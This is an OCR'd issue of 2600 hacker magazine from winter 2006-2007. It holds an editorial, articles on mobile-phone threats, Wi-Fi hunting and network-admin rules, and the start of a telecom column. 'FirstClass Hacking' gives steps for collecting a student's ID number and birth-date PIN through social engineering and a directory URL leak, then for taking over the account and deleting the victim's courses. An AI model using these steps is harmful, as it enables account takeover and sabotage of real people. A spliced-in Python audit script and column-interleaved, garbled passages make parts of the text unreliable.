
Transition
Mobile Devices - Current and Future Security Threats
FirstClass Hacking
Network Administrators: Rules Rationale
Wi-Fi Hunting: Basic Tools and Techniques
Telecom Informer
Circumventing the DoD's SmartFilter
Algorithmic Encryption Without Math
Red Boxing Revealed for the New Age
How to Get Around Cable/DSL Lockdowns
Hacker Perspective: Phillip Torrone
Library Self-Checkout Machine Exploit
Fun with Novell
How to Build a Book Safe
Network Programming and Distributed Scripting with newLISP
Letters
Techno-Exegesis
GasJack - Hijacking Free Gasoline
Motorola IMfree as a Wireless iTunes Remote
The Not-So-Great Firewall of China
Hactivism in the Land Without a Server
K7: Free [for the taking] Voicemail
Marketplace
Puzzle
Meetings
"It has become appallingly obvious that our technology has exceeded our humanity." - Albert Einstein
STAFF

Editor-In-Chief
Emmanuel Goldstein

Layout and Design
ShapeShifter

Cover
Frederic Guimont, Dabu Ch'wald

Office Manager
Tampruf

Writers: Bernie S., Billsf, Bland Inquisitor, Eric Corley, Dragorn, John Drake, Paul Estev, Mr. French, Javaman, Joe630, Kingpin, Lucky225, Kevin Mitnick, The Prophet, Redbird, David Ruderman, Screamer Chaotix, Sephail, Seraf, Silent Switchman, StankDawg, Mr. Upsetter

Webmasters: Juintz, Kerry
Network Operations: css
Quality Degradation: mlc
Broadcast Coordinators: Juintz, thai
IRC Admins: koz, SJ, beave, carton, r0d3nt, shardy

Inspirational Music: Ride, The Frank & Walters, Focus, Harry Gregson-Williams, Jean Leloup, Jah Wobble, Asian Dub Foundation, Nilsson, Flotsam & Jetsam (original)

Shout Outs: Steve Rambam, Rick Dakan, Mitch Altman, Mike Aiello, DerEngel, No Starch, Prometheus, Stevens Institute, Montreal 2600

2600 (ISSN 0749-3851, USPS # 003-176), Winter 2006-2007, Volume 23 Issue 4, is published quarterly by 2600 Enterprises Inc., 2 Flowerfield, St. James, NY 11780. Periodical postage rates paid at St. James, NY and additional mailing offices. Subscription rates in the U.S. $20 for one year.

POSTMASTER: Send address changes to 2600, P.O. Box 752, Middle Island, NY 11953-0752.

Copyright (c) 2006-2007 2600 Enterprises Inc.

YEARLY SUBSCRIPTION:
U.S. and Canada - $20 individual, $50 corporate (U.S. Funds)
Overseas - $30 individual, $65 corporate

Back issues available for 1984-2005 at $20 per year, $26 per year overseas.
Individual issues available from 1988 on at $5.00 each, $6.50 each overseas.

ADDRESS ALL SUBSCRIPTION CORRESPONDENCE TO:
2600 Subscription Dept., P.O. Box 752, Middle Island, NY 11953-0752 USA (subs@2600.com)

FOR LETTERS AND ARTICLE SUBMISSIONS, WRITE TO:
2600 Editorial Dept., P.O. Box 99, Middle Island, NY 11953-0099 USA (letters@2600.com, articles@2600.com)

2600 Office Line: +1 631 751 2600
2600 Fax Line: +1 631 474 2677
Transition

It's been a sobering period recently in the world of publishing. All around us we hear gloomy tidings of the condition of the industry and its prospects for the future. We've been saddened to witness the demise of some other printed publications as their expenses became too much for them to bear. The alternative voices always seem to be the first ones affected while those immersed in the world of advertising and all things commercial seem to weather the storms and survive the challenges. Money in abundance tends to make such things possible.

Our mission has always been to provide information and provocative thought without being tainted by the wanton commercialization that afflicts so many. As we come to the end of our 23rd year, we're both amazed that we were able to pull it off and confident that we can continue to fulfill this purpose in the years ahead. We are unique in the publishing world and so is our audience. And since our subject matter is mostly about individuality, challenging the status quo, and figuring out the exception to the rules, this all ties together rather nicely.

But we too have faced some daunting challenges in recent months and they have resulted in some painful decisions for us. Despite our unique position, we still feel the effects of trends and right now the trend is a downturn for anyone in the publishing business. As mentioned, this mostly affects the small publishers since they don't have much to fall back on. Large publishers can jack up advertising rates, lay off staff, and even merge with other publications without missing a beat. To them it's merely a business decision. But for noncommercial publishers it's a bit trickier.

Distributors only pay publishers for issues sold. The rest are destroyed at the publishers' expense. The bigger bookstores and newsstands can often thrive by providing alternatives to whatever is not selling at the moment, even if that means cutting back on books, magazines, and newspapers. In that section of the industry, the independent retailer feels it the hardest. In a parallel to the small publishers' problems, small bookstores all over the country have felt the pressure and are increasingly falling victim to the huge chains which now dominate. It's a sad situation, one which we see repeated in so many different ways in our society.

We have a great advantage in that our audience is already clued in to a great deal of this and understands the value of a printed publication such as ours. Ironically, the very people who understand technology and the Internet on a level far exceeding the norm are the same people who still value ink on a page and the power of the printed word, something that is mostly lost in the world of the net. So while we certainly feel the effects of what has been happening in the world of publishing, we think we'll be able to weather the storm, assuming that's what our readers want.

In the end that's really what it's all about. If we cease being relevant to our readers, our existence comes to a conclusion. This is how it should be. In fact, we believe there would be a lot less commercial publications for that very reason if they weren't doing so well on the advertising front. We don't have that luxury nor do we want it. A publication should exist entirely to serve its readers. We hope we continue to achieve that goal. Your vote determines whether or not we do.

We also hope our modest price increase on the newsstand won't be a hardship. It's our first one in quite a while and we avoided it as long as we could. We can't ignore the rising costs around us and the increasing challenges of the marketplace. However, we have also moved forward with a planned increase in pages and as of this issue we have four more of them. We have not changed the subscription price and it remains what it has been for more than 15 years. We've also lowered the newsstand price in Canada to reflect more accurately the currency conversion there.

This is only one step we've been forced to take in order to deal with all of the challenges thrown our way. We have had to change printers for the first time in 20 years, a move we resisted when we could afford to. It's a very sad fact but sometimes a business decision has to supersede loyalty and tradition. In this case, the only alternative would have been cutbacks and price increases that in our opinion would have been unfair to our readers.

From our perspective it certainly seems as if an undue amount of the burden comes to rest on publishers which in turn causes so many of them to cease what they do. Over the years we've seen a large number of distributors collect money from bookstores and fail to pay the publishers who sent them the magazines in the first place. The distributors then declare bankruptcy and the publishers never get paid. This scenario seems to play out on a yearly basis somewhere and each time it does, a few more independent voices are silenced for good. We've also seen many chain outlets go under and fail to pay their debts, causing the same trickle-down effect. In addition to all of this, we must frequently accept terms and conditions that go against common sense and are seemingly designed to put the publisher at a disadvantage.

A good example of this is something known as "shrink policy" in Barnes and Noble, the largest bookstore chain in the United States. Shrink is the industry term for issues that cannot be accounted for after being delivered to the store. This policy actually forces publishers to pay a significant portion for these issues, as if they were somehow responsible for them. The thinking - as far as we can tell - is that if copies of your publication are being shoplifted, it's the fault of your readers and therefore your responsibility. But this doesn't take into account a number of things. Issues can get lost in a store for a number of reasons such as misfiling or accidental destruction. They can also be stolen by store employees themselves. (Industry surveys have found that more than half of store thefts come from people who work in the stores.) In extreme cases, anyone (employee or customer) can decide they don't like us and pitch all of our issues into the trash.

In the past, a major cause of shrink was the failure of the cashier to properly enter the sales data into the computer. Sometimes the bar code wouldn't scan properly and a generic sale that didn't have the publication's name would be processed instead. This meant that there was no actual record of the magazine being sold even though the store collected the money. We're told that such a scenario is now impossible. We find that extremely hard to believe.

The main problem, though, is that this policy is horribly unfair to publishers. By this logic, if we were to buy a book at Barnes and Noble and someone stole it from us afterwards, we could hold the bookstore responsible. It goes against all common sense. The only way publishers should be held liable for missing issues is if they somehow have the power to do something about it. We've offered to send in our own security people to various stores to stand guard over copies of 2600 to ensure that none disappeared. (We naturally would have to watch them after the store closed as well to prevent employee theft.) No store has yet agreed to this.

Don't get us wrong - Barnes and Noble has been a great resource in getting our magazine out to the public and we're thrilled to be on their shelves. But we're also compelled to speak out when something doesn't seem quite right, whether it's an issue like this or a security hole in a computer or phone system. It's what we do and it's what continues to make us unique. And, in this case, not saying something could help this policy to become the norm in all bookstores, something which once again would hurt the small publishers far more than the big ones.

All in all, we think we're going to be in pretty good shape once we get through the woods. In the next issue we're planning on including a survey form for subscribers so we can all plan for the future and learn from the past. We look forward to embarking on more fun projects in the future involving publishing, HOPE conferences, films, radio, new technology, etc. And, of course, controversy. We hope you all continue to be a part of it.
Mobile Devices - Current and Future Security Threats

by Toby Zimmerer

This article will focus on a system that many people utilize every day. Yet they are oblivious to the power of the threat that they are exposed to. That system is your mobile phone. The advent of smart phones and PDAs has spawned a new security hole that the majority of people completely ignore. Most mobile phones can access the Internet and have Bluetooth communication systems for linking other devices without the use of cables. Additionally, smart phones are utilizing Linux and Windows operating systems and have the processing capabilities of a small computer. Since these devices do not have a built in firewall and provide multiple open communication channels, it becomes perfectly clear that mobile phones pose a prime target for attacks.

Mobile Devices and Operating Systems

Smart phones are currently using two operating systems (Symbian and Windows Mobile 5) that are customized to each cellular provider's mobile device. Symbian (http://www.symbian.com/) is a lightweight Linux operating system that is bundled with a number of applications that can allow a user to work on the road without the use of a laptop. Microsoft has taken their lightweight Windows OS that was originally developed for the iPAQ and into the cellular provider market by developing Windows Mobile 5 (http://www.microsoft.com/windowsmobile). Microsoft offers a complement of applications to allow a user to work remotely without the use of a laptop.

For those of you not familiar with smart phones, I would suggest looking at the websites for Symbian and Microsoft Mobile in order to see the mobile devices that are currently supported. As I mentioned earlier, smart phones have the processing capabilities of a small computer. These phones are normally equipped with 64MB to 128MB of memory and can be expanded up to 2GB of additional memory by adding a mini SD memory card to the phone. Some smart phones have integrated keyboards and touch screens that allow you to quickly navigate through menus and enter information. I own a Nokia 9300 that flips open to give the user access to a 1" x 4" high resolution LCD, a 66 button keyboard, and a thumb mouse.

Open Communication Channels

Mobile service providers have expanded their services to provide users with greater access to information through their mobile phones. People in Europe and Japan have been using their mobile phones for web access, messaging, and purchasing goods directly from their mobile phones long before the U.S. market started to offer these services. Mobile phones can retrieve an IP address from their mobile service provider, which provides full access to the Internet to transmit HTTP, SMTP, SSH, telnet, and other TCP/UDP functions.

Most devices are now equipped with Bluetooth to allow the user to connect to their laptops, wireless headsets, or other mobile devices. Bluetooth has a transmit radius of approximately 30 feet and can be configured to allow other devices to find or "discover" the host device. Open Bluetooth channels broadcast a lot of information, including the MAC address, device name, and device model. I saw a demonstration at the Interop show in Las Vegas this year where the vendor was listing all of the Bluetooth connections that were currently open near their booth. On average, there were 60 open Bluetooth connections near the vendor's booth and they were able to retrieve the device name and device model. As a test, I switched on the Bluetooth connection on my phone, disabled the discover feature, and my device was detected.

If you are interested in performing some Bluetooth vulnerability scanning, I would recommend checking out BTScanner by PenTest (http://www.pentest.co.uk/), which runs on a desktop system, or Blooover (http://trifinite.org/trifinite_stuff_blooover.html), which runs on your handheld device.

Current and Future Mobile Threats

Mobile device viruses began to show up in 2004 with the release of the Cabir virus. Since then, the number of viruses has grown exponentially, which has resulted in both financial and hardware loss. The Skulls and Onehop viruses are designed to completely disable the mobile handset, whereas the CommWarrior virus will start to transmit SMS messages to everyone in your address book, resulting in additional costs on your phone bill.

These viruses currently propagate through two mediums: SMS and Bluetooth. The CommWarrior virus shows up as an SMS message with an SIS attachment. If the user activates the attachment, the mobile phone will become infected. Bluetooth viruses, such as Cabir, broadcast a message with an attachment to all Bluetooth devices in range. Once again, if the user activates the attachment, the phone will be infected.

As I had mentioned earlier, mobile devices are now retrieving IP addresses and run compact operating systems to provide the user with all the features and functions of a desktop system on their mobile devices. These systems do contain software flaws and holes that will eventually get exploited through the open Internet channel on the devices, leaving the users vulnerable to attacks. As of March, the first Java2 ME viruses started to appear. Sooner or later, viruses will start to propagate to mobile devices over the Internet.

Defending Against Mobile Threats

Currently some software companies are offering anti-virus and firewalls for mobile devices. I would recommend doing some research on the different vendors to see which companies support the broadest range of mobile devices and operating systems. I know one company has been designing mobile AV/firewall solutions for a number of years and has a pretty distribution throughout the world with a number of mobile service providers. I will let you make your own decision on which route to go. Additionally, I would scan your open Bluetooth connections to see how many open connections you have. Finally, and most importantly, educate yourself and those around you. Most of the current mobile viruses can be thwarted by deleting the attachment or not opening it at all.

Mobile devices are the next vulnerable resource on the market today and will eventually be targeted by viruses that spread across multiple communication channels. As the complexity, features, and processing power of the mobile devices increase, they will provide a prime avenue for malware to exploit. By protecting your mobile devices with anti-virus and firewalls, as well as disabling unnecessary services such as Bluetooth, you can protect your network and yourself from current and future threats.
FirstClass Hacking

by Cristian

The idea to write this article came from reading this magazine for a while. I noticed that lots of people were writing in about the (in)security of the place they were studying in. Having read all these articles/letters very thoroughly, I decided to look into the security in the place I go to study. I go to an English CEGEP, which is basically a hybrid of year 12 in school and the first couple of years of university. When you first enroll into the CEGEP you are given a student ID card which has a magnetic strip, your picture, and your student ID number. The magnetic strip contains the SID number too, as well as a "charge" of $4.00 CDN in order to be able to print in certain computer labs throughout the campus. Using a combination of methods, we will obtain both the SID number and the corresponding password, thereby showing how vulnerable this system really is. This of course should be taken as an educational guide and not to be used for your own gain.

The Student ID Number

The student ID number is used to log into your FirstClass (www.firstclass.com) account, which is the piece of software used all over the campus for pretty much any class related tasks. We use FirstClass for everything, from viewing our assessments to communicating with the teachers. Teachers, on the other hand, use it to actually put our grades into the system, calculate class averages, etc. We also use this SID to log into our "For Students Only" section where it shows us all our grade history, our current schedule for the semester, our CRC score (a sort of GPA), and a couple of other features. It is also used for the OmniVox service. We use this web-based service to view our grades with more details (class averages, graphs, etc.), pay our student fees for the semester, get a tax receipt for being a student, or change our home address and phone number. Lastly, we use the SID to be able to make our schedules a couple of weeks prior to the semester starting. The system is phone based, so you simply call and follow the instructions given to log in.

Vulnerabilities

The Birthdate

There are various vulnerabilities in the system, so I will go in the order I discovered them. Upon your first entry to the college, they tell you that your pin (to be used in FirstClass, "For Students Only," OmniVox, and course registration system) is your birthday, in the form of DDMMYY including the 0s if the day or month has it. Social engineering, anyone? If you are able to engage in a conversation with someone, it should be quite easy to obtain their date of birth. Even worse, the CEGEP I attend is chock full of people who use the infamous MySpace.com website, so even if they don't tell you their date of birth, asking them for their MySpace page is another option. Simply looking at their description may reveal this bit of information or, if not, look at the comments other people leave. There might be messages wishing a happy birthday and then you can deduce the date of birth of the person.

The Student ID Number

Knowing the birth date is only half the information we need since the SID number is the next important part. The SID number is seven digits and has the format YYXXXXX, where YY is the year you first enrolled into the CEGEP and the remaining Xs are
generated at random (to my knowledge). Finding this number is quite easy and there are actually various ways to find it.

For one thing, everyone must carry their SID card inside the campus or they will be kicked out by the security guards as well as fined $50 CDN. Again, social engineering can be applied here and simply asking someone you know to show you their ID card to see how goofy they look in their picture will give you full access to the SID, so memorizing it shouldn't be that big of a problem.

Another way to find it is by looking in the recycling bins. The students over here print like crazy, and in all essays/lab reports, etc. you must provide your name and SID number so the teacher can then input the grade into the FirstClass system. Usually you can find old lab reports or pages that have mistakes in them with the student's name and SID number fully viewable in the page's header.

The third way to find it is directly via the FirstClass system. Upon logging into the system, you will be greeted by the "Desktop" of your FirstClass account which has links to your mailbox, address book, calendar, current semester registration process, conferences, uploaded files, help, news, and student body forum. To your left you have the FirstClass menu system, which has links to logout, who's online in the system at the time, instant message menu, preferences, and, more importantly, the directory.

The directory is a search engine which takes in a name (or part of a name) and searches matches across the student body and the faculty/teachers. Now if you search for someone (let's say Smith), it will return anyone with the surname Smith in it (both student and teacher). Once the matches appear, it will provide links to their FirstClass shared files folders. For teachers, this is quite useful since they can provide class notes, PowerPoint presentations, etc. for everyone to download. For students, well, I haven't met anyone that actually uses that service yet. The important part here is the list of links that is provided when a match is found. If the person is a teacher (let's say we found a teacher named John Smith), then pointing to the link will provide an address such as the following in the status bar of your browser:

http://firstclass.COLLEGENAMEHERE.qc.ca/Login/~SMITHJ/

There isn't very much to work with in that link, right? Well, now let's say that the list of matches is greater than a single result and that at least one of the matches is a student. If you point to that link, the status bar will display the following address:

http://firstclass.COLLEGENAMEHERE.qc.ca/~yyxxxxx/

Recognize something there? Lo and behold, the link provides the SID number of the student we searched for - without even knowing the student in real life.

It is also worth noting that when you change your password for the "For Students Only" page, it only applies to that individual system. Your birth date will still be the password for the OmniVox, FirstClass, and phone registration systems. Even worse, in order to actually change these passwords, you cannot do it via the actual system. You must physically go to the IT Administrator's office (which very few students know how to find) with two pieces of ID in order to change them. Making it this hard to change a password is very unreasonable. Students are lazy and they have work to do. They aren't going to go through the trouble of finding out where the office is just to change their password. They'd rather just keep it as it is and just forget about the potential consequences that could happen.
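
One way an administrator could measure and close the birth-date PIN problem described above, as an added example that is not code from the article or from FirstClass. The PBKDF2 storage scheme, the field names, the age range and the sample accounts are assumptions made for the illustration.

```python
import hashlib
import hmac
import os
from datetime import date, timedelta

ITERATIONS = 50_000  # assumed KDF cost; the article does not say how PINs are stored


def hash_pin(pin: str, salt: bytes) -> bytes:
    """Salted, slow hash of a PIN (assumed storage scheme for this sketch)."""
    return hashlib.pbkdf2_hmac("sha256", pin.encode(), salt, ITERATIONS)


def default_pin(birthdate: date) -> str:
    """The default the article describes: birth date as DDMMYY, zero-padded."""
    return birthdate.strftime("%d%m%y")


def date_shaped_pins() -> set:
    """Every 6-digit string that reads as a real DDMMYY date, 1900 to 2099."""
    pins, day = set(), date(1900, 1, 1)
    while day <= date(2099, 12, 31):
        pins.add(day.strftime("%d%m%y"))
        day += timedelta(days=1)
    return pins


DATE_SHAPED = date_shaped_pins()


def cohort_pin_space(enrol_year: int, min_age: int, max_age: int) -> int:
    """Number of distinct default PINs for students who enrolled in enrol_year
    (the YY prefix of the SID) at an age between min_age and max_age."""
    oldest = date(enrol_year - max_age, 1, 1)
    youngest = date(enrol_year - min_age + 1, 1, 1)
    return (youngest - oldest).days


def check_new_pin(pin: str, birthdate: date) -> list:
    """Return the reasons a proposed PIN should be refused (empty list = accept)."""
    if len(pin) != 6 or not pin.isdigit():
        return ["PIN must be exactly six digits"]
    reasons = []
    own = {birthdate.strftime(fmt) for fmt in ("%d%m%y", "%m%d%y", "%y%m%d")}
    if pin in own:
        reasons.append("PIN is the account holder's birth date")
    if pin in DATE_SHAPED:
        reasons.append("PIN reads as a calendar date (DDMMYY)")
    return reasons


def audit_default_pins(accounts: list) -> list:
    """Return the SIDs whose stored hash still matches the birth-date default."""
    flagged = []
    for acct in accounts:
        candidate = hash_pin(default_pin(acct["birthdate"]), acct["salt"])
        if hmac.compare_digest(candidate, acct["pin_hash"]):
            flagged.append(acct["sid"])
    return flagged


def make_account(sid: str, birthdate: date, pin: str) -> dict:
    """Build a constructed sample record the way a registrar system might store it."""
    salt = os.urandom(16)
    return {"sid": sid, "birthdate": birthdate, "salt": salt,
            "pin_hash": hash_pin(pin, salt)}


# Constructed sample data: SIDs, birth dates and PINs are invented for this example.
SAMPLE_ACCOUNTS = [
    make_account("0612345", date(1989, 3, 7), "070389"),    # never changed
    make_account("0654321", date(1988, 2, 29), "482915"),   # changed by the student
    make_account("0500017", date(1987, 11, 23), "231187"),  # never changed
]

if __name__ == "__main__":
    print("date-shaped PINs:", len(DATE_SHAPED), "of 1,000,000")
    print("PIN space, 2006 intake aged 16-20:", cohort_pin_space(2006, 16, 20))
    print("accounts still on the default PIN:", audit_default_pins(SAMPLE_ACCOUNTS))
    print("policy on 070389:", check_new_pin("070389", date(1989, 3, 7)))
```

The audit gives the IT office a list of accounts to force through a PIN change, and the policy check belongs in every system that accepts the PIN, since a change made in one of them does not carry over to the others.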

Combining these two pieces of information gives us literally access to anything related to that particular student. You are able to change their address, their phone number, and once schedule-making time comes, you can easily delete all his/her courses and have him/her be charged $50 CDN for registering late, as well as leaving an empty spot in the classes he/she took (which, if you need that course, can be taken by you).

It's very surprising that they have such an elaborate system for managing your stay at the CEGEP, but it can be very easily bypassed with a few simple clicks and a little bit of social engineering. Even worse is the terrible method that they have to perform a simple task like changing a password. If you ask me,
it's a small ce to for your

Network Administrators: Rules Rationale

by The Piano Guy

When I wrote my article "Network Administrators: Why We Make Harsh Rules" (22:4), my purpose was to explain what seemed like, to some, capricious rules that some network administrators hand down. I did it in reaction to a student (Luke) who ran afoul of the rules and was being taunted by a stupid and unprofessional network administrator. I wrote the article with a bit of fear and trepidation. Though I didn't think this was what I was doing in reality, I felt like I might be perceived as "the other side," rather like Hamas writing into the Jewish News to explain their actions.

The next issue had an attack letter implying that my article was stupid and that I should just stop whining and "do my job." The editor of 2600 challenged the letter's author, explained why I wrote it, and why they published it. Frankly, I thought a former employee of ours sent in the letter. I write like I talk, he reads and writes for this magazine, and he's certainly smart enough to figure out that I authored the original article. If my hunch is right, the man is stunningly brilliant with computers. He certainly had more technical skills than most, including me. He didn't, however, work in my department, didn't like me, and I don't know why he was fired, other than to know that I had nothing to do with it.

Three months later, kaigeX wrote a thoughtful rebuttal article. Though he took me to task, he mostly agreed with more than half of the rules that the other system administrator handed down for me to enforce. A well-reasoned response deserves a well-reasoned rebuttal. To clear the air, I'm going to review the points he made about the points in my article. If you can't follow all of this, do remember that 2600 does sell back issues.

His interpretation of my rules was in essence "we make harsh rules to make our lives easier and/or to protect ourselves." He didn't think this was legitimate. I don't exactly agree with his interpretation. If I had to boil this down, I would say that we make harsh rules to keep the network usable for all people so they can get their jobs done and to protect the employer (owner of the network) from massive expenses in repairs and/or from legal action from outside entities. Do note that I'm not offering "so they can manage their personal lives better (i.e., checking your Gmail or doing your banking online)." The purpose for providing computers in the first place is to facilitate work. That's why the owners pay for the network, and for me to run it. When put that way, the emphasis changes.

He didn't think that our library computers were secured at all, thus unfit for use by him. I don't think

cause a problem, then we probably weren't going to even notice. He somehow makes the leap that we expect people are going to have to break the rules to get their jobs done, so we set the expectations high knowing the people aren't going to follow them. Maybe kaigeX has never had to deal with a legal department. Surely he can use some clarification about how and why I do things. The purpose of the network is so people can get their work done. Everything we do derives from that basic premise.

No one ever has to break a rule to get his or her job done - period. This is so true that if something comes up requiring a user to break a rule to get their job done, we either find a different way or change the rule, which covers Number 9 (no hacking). This also covers Number 2 (no one connects devices without permission) because if they need it for their job they have permission. It covers Number 3 (no one installs their own software) and Number 8 (no copyright infringement). If they need it, we buy it for them so we're legal, and support it. Unlike where kaigeX has been, we are 100 percent legally licensed for everything. In fact, that was the main reason why my predecessor was fired - he didn't see a need to be 100 percent legal. And peripherally, it covers Number 5 (no chat software). We encourage people to use their mail clients as if they are chat clients. It's almost as fast and this leaves an audit trail for them to refer to later (in their Sent Items).

Further, we try to strike a balance between being a police state and being open to lawsuits. We could strictly enforce Number 1 (business use only) and Number 10 (no expectation of privacy), but that would be highly stupid and counterproductive. It would take a lot of time and resources, and it would irk people to no end. However, let's say that someone does something really stupid, like surf for kiddy porn while at work (which happened where
that's what I said, and I'm certain that's not what I I was employed in 1991). We need legal grounds to
meant. They are secured. They are on a diferent
look for it if we suspect something, or handle it if we
network (good question to ask, kaigeX). They aren't
find it by accident . We also need legal protection so
as restricted and are perfectly useful for web mail we can terminate this employee without being sued
when employees are on break.
by them. In this extreme example, a law was broken.
He thinks the "hard rules" cause a loss of produc- So heaven forbid it if ever happens to us, we would
tivity. The opposite is true. So is my emphasis. In
need legal protection to turn in evidence against
fact, it is my job to find ways to improve processes
them to the police.
to make people's work easier. Sometimes that means Onto other points. KaigeX's disagreement with
writing a Crystal Report or some SQL code. Some-
my Number 4 (no outside email clients) goes against
times that means buying, installing, and supporting
productivity for work and also puts my network at
specialized software on a user's computer. And yes,
risk. It also causes political problems in the work-
sometimes that means opening up services on the
place. My brilliant former coworker (BFC) is more
network just for a certain department . Whatever it is,
than smart enough not to bring in viruses via his
it is my job to serve.
outside email usage, but his ignorant department
Now, if I'm constantly chasing down viruses and/
director (100), two management levels above him,
or spyware, dealing with user complaints about how
is computer stupid. If BFC has the "right" to check
slow the network is, or spending time in depositions
his email, how am I going to deny this to IDO? If I
answering questions about copyright infringement
do deny it, what's to prevent 100 from demanding
by one of my users, I won't have time to find new
that BFC set this up for him, even if I've said not to?
efficiencies, let alone implement them.
Nothing. Also, if BFC sets it up, I have no way to
The comment I made that bothered kaigeX the
block attachments from coming in for 100 to open
most was that if someone broke a rule and it didn't
up (a workaround that kaigeX suggested), taking my
P
g
e 10 2600 Ma
g
azine
network and the workstations on it to DOA.

Remember folks, I didn't write these rules. I was handed these rules to enforce, and I do. I also have to follow them, if not for safety reasons, then for political reasons. If I broke a rule I am supposed to enforce and did serious damage to the network as a result, the person they hired to replace me would be the one to clean it up. Lastly, I've always held the perspective that one thing worse than a hypocrite is being one.

More or less, kaigeX agreed with every other point I made. He didn't necessarily like that he had to agree with me, but apparently it didn't occur to him that I don't necessarily like to have to take a position either.

Lastly, kaigeX made one blatant factual error. He feels that I am at risk because of my Win2K workstations not getting security patches. Go to http://support.microsoft.com/lifecycle/?p1=7274 and http://support.microsoft.com/gp/lifecycle (unless Micro$oft changes the pages). They make clear that security patches are provided through 7/13/2010. By that date all of my 2000 machines will be long retired, and my employer will probably have a combination of XP Professional and whatever is newer than that for the desktop.

Shouts out to kaigeX (for a reasoned rebuttal) and the anonymous network administrator who both set these rules we're discussing and taught me a lot over the last years of working with him.

Wi-Fi Hunting: Basic Tools and Techniques
by Rick Davis

From war-walking to war-driving the art of finding wireless connections has become a game for a new mix of computer users. Finding new techniques calls upon knowledge in antenna design and signal theory along with various aspects of computer hardware and software. Sometimes though these higher level techniques are not reasonably used and for many that have not had experience with them simpler methods need to be employed. With this in mind the following will explore some of the best methods, in terms of cost and ease, to seek out available wireless connections.

Get Your Gear - Basic Hardware

At the most basic level you need only a laptop or other device that can connect to wireless connections. I recommend a laptop so that you can use some advanced software and several applications simultaneously (see below). Also, a wi-fi finder is very useful and will make your search quicker, more productive and much more incognito. These devices can be found in any major electronics store and range from $10 to $30. They usually have a few LED lights packaged inside a casing about the size of any other pocket electronic device. Although they all have different features, they all do about the same thing which is indicate any time a wireless connection is detected by lighting a light. Some models can also tell you the strength and type of signal but I prefer to use my software for that and save the extra money.

More Gear - Basic Software

Get familiar with your OS's built in function to connect wirelessly because that can be used in many cases and is usually a quick way to connect. For example, Windows XP users can simply right-click the icon in the system tray to open the connections window which will display any available networks.

In addition, Network Stumbler provides a gold mine of information and in many cases may be the only other application you need. What this does is gather information from any signal it finds such as SSID, signal strength, security, and encryption being utilized along with many other features. There are many ways to keep the basic operating system from finding a connection (such as not broadcasting your SSID) however if there is a signal Network Stumbler will notify you.

It's also worth noting that some of these programs seek connections actively while others seek passively and depending on your situation this can make a difference. Actively means that your program is sending information in order to get a response and collect data, while a passive program transmits nothing and only collects what is passing by. Passive programs can take much more time to locate connections and will usually not detect all available data however it will also not get you logged by any software or data and connection logs.

Are You Secure?

Connecting at random locations, especially schools and cafes, will open your computer to possible attacks by many people. Most will be just
ess people who click on anything their system may find although some will be far more advanced and able to access your system if you're not protected. Luckily, some basic steps can be taken to make you less of a target and not worth the trouble among a group of others.

First, firewalls are a must and one from a third party is a good idea to add an extra layer to whatever your operating system may already have running. Make sure you have them set to ask for authorization for any connection or data transfer and that you have security logs running. Next, make sure you have all the updates for any operating system you use as well as any software that connects to the Internet or is linked to the OS (such as chat programs). Finally, it should go without saying but make sure you have a fully updated anti-virus running.

Let's Get Started!

Option 1 - Locating a connection within a specific area: Whether it's a city block where you have lunch or your school campus, this is a great way to quickly map out connections without drawing any attention. You can either make a rough drawing of the area you want to search or you can take a notepad to quickly note where you found a signal to look into later. In either case just take your wi-fi finder and start wandering around. If you are not worried about being seen, or just don't think anyone will care, you can cover the whole area at once. Otherwise make sure you remember where you have been so your next trip will not duplicate your progress. Again, there are two options for a thorough search. Either walk around in a pattern so that all the searchable area is covered or just circle buildings or open areas where you would want to connect or expect to see a connection.

If you want to find everything available you should really walk through the search in a logical progression. On the other hand if your needs are more legitimate you may want to narrow your search to places where you can plug something in to charge or have a bathroom or soda machine nearby.

Option 2 - Always on the hunt: In this case you just want to keep a note of any connection you come across in regular travels or where you have no specific target in mind. If you're driving or walking you can easily clip your wi-fi finder on your belt or car visor and make a note when it goes off. On the other hand if you have a reasonable battery or are taking a short trip you can keep your laptop running in a backpack, carrying case, or even folded under your arm.

This can get somewhat cumbersome after a while although once you go through an area you can probably skip it for a few months. And of course while you are in an area where you know you will not connect, you can either power down your gear or completely ignore it.

Signal Found - Let Me In!

Now that you know where the signals are it's time to connect. The easiest method will be for an unsecured access point in which case you can click connect and you're online. Sometimes you can find a signal but cannot connect because you need some information and this is where your software comes in. Network Stumbler will give you the SSID of any connection and sometimes a router is set for open access and is just not broadcasting its ID. So all you need to do is manually enter it and, once again, you're online. Now the final piece of data from the Stumbler is the type of router you have accessed. Connecting to anything other than an unsecured access point is beyond the scope of this article. Whatever you might want to do however will require information on the type of router.

Closing Tips

Keep in mind that others have probably needed to connect in areas you're interested in as well. Don't be afraid to ask anyone nearby if they know of an access point. Also, at a school campus or office building you can always ask security or any computer technician. You may find out some great information plus if you are really only looking for legitimate access they will be able to warn you about anything that is off limits.
Hel l o, and greeti ngs from the Central Offi ce! technol ogy operated by Ver i zon, Spri nt, Al ltel,
At l east I thi nk i t ' s the central offi ce. Unfortu- US Cel l ul ar, and numerous other U. S. carri ers,
natel y, I was al ready hal fway to Japan when the t he transmi t and recei ve frequenci es are - for
sushi hi t the fan. After I got through runni ng some reason - t he exact opposi te of t hose used
fiber to the i gl oo in Adak, my empl oyer sent i n the U.S.
me here to Tokyo. I don ' t read Japanese, but my Gl obal roami ng i s avai l abl e to Japanese
hosts assured me that central offi ces here are travel ers usi ng the GSM standard on al l three
al ways cl ean, the vendi ng machi nes are wel l - carriers, and the COMA standard usi ng Au.
stocked, and the toi l et seats are supposed to However, t hi s requi res a speci al phone, and
be heated. Unfortunatel y, they al so assured me roami ng rates are very h i gh (for example,
that when I ' m through wi th my work, I real l y domest i c cal l s i n the U. S. are about US$1. 00
do have to go home. per mi nute whi le roami ng wi th a Japanese
When I haven' t been ei ther worki ng or phone) . Thi s probabl y expl ai ns why so few
buyi ng used school gi r l s' panti es out of the Japanese phones offer gl obal roami ng; Au,
vendi ng machi ne at Love Merci Aki habara ( i t's for exampl e, currentl y onl y offers one such
on the second fl oor), I have been marvel i ng at phone.
the mobi l e phones here. Everywhere i n Japan, Everythi ng i n t hi s country is more compl i -
you ' l l fi nd peopl e texti ng, browsi ng the web, cated than it needs to be, and mobi l e phone
and taki ng pi ctures. They rarel y tal k on them, pl ans are no excepti on. There i s a di zzyi ng
though; i t ' s consi dered rude i n most publ i c array of pl ans, wi th onl y one common theme:
pl aces. Don't answer your "kei tai " (the Japa- they' re absurdl y expensive by U. S. standards.
nese word for mobi l e phone) on a trai n, or A typi cal pl an (usi ng Au as an exampl e)
